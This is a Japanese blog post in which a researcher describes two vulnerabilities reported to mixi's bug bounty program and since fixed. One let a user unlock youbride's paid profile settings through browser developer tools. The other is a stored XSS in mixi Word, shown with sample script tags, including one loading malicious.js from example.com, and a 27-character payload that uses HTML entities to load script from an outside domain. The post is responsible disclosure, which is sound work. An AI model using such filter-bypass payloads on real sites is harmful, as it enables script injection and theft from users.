Hatena::ブログ(Diary)

kusano_kの日記

2014-04-09

mixiに報告した脆弱性2

mixiの脆弱性報告制度(すでに終了している)で報告して、修正された脆弱性。

youbrideの有料機能を無料で使える問題

  • 2014/03/12 報告
  • 2014/03/18 修正完了
  • 2014/03/24 75,000円Amazonギフトが届いた

youbrideはmixiの子会社の株式会社Diverseが運営する婚活サイト。一時、制度の対象だった。

youbrideでは無料ユーザーはプロフィールの公開条件は「全体に公開」しか選べない。

f:id:kusano_k:20140410004607p:image:w360

ChromeのDeveloper Toolで他の選択肢を有効にしたら、「全体に公開」以外の公開条件も選べてしまった。

mixiワードのXSS

  • 2014/03/31 報告
  • 2014/03/31 修正完了
  • 2014/04/09 125,000円のAmazonギフトが届いた

mixiワードにXSS可能な脆弱性があった。

「猫」には、キャットタワー、キャットフード、猫の里親募集、捨て猫、子猫、イルカ、ペンギンなどのワードが関連しており、…

の部分。mixiワードはコミュニティを作成し、関連ワードから追加できる。出力時には何もエスケープされないけれど、文字数が30文字以内、/, (, )などが全角文字に変換されるという制限がある。

<script>alert(0)</script>

というようにスクリプトを埋め込もうとしても、scriptタグが閉じられない。後続の文字がスクリプトとして認識されると文法的にエラーになってスクリプトが動かない。スクリプト中で()が使えないのもつらい。

<script src="http://example.com/malicious.js">

と外部のスクリプトを読み込もうにも/が使えない。

答え

<script src=&#47&#47イマ.net>

27文字。属性値ならば実体参照が使える。短いドメインを持っていて良かった。報告したときは、イマ.netのトップページがJavaScriptを返すようにした。ちなみに、mixiワードは一度作ったら消せないらしい。変なワードを作ってしまって申し訳ない。

スパム対策のためのダミーです。もし見えても何も入力しないでください
ゲスト


画像認証

トラックバック - http://d.hatena.ne.jp/kusano_k/20140409/1397059837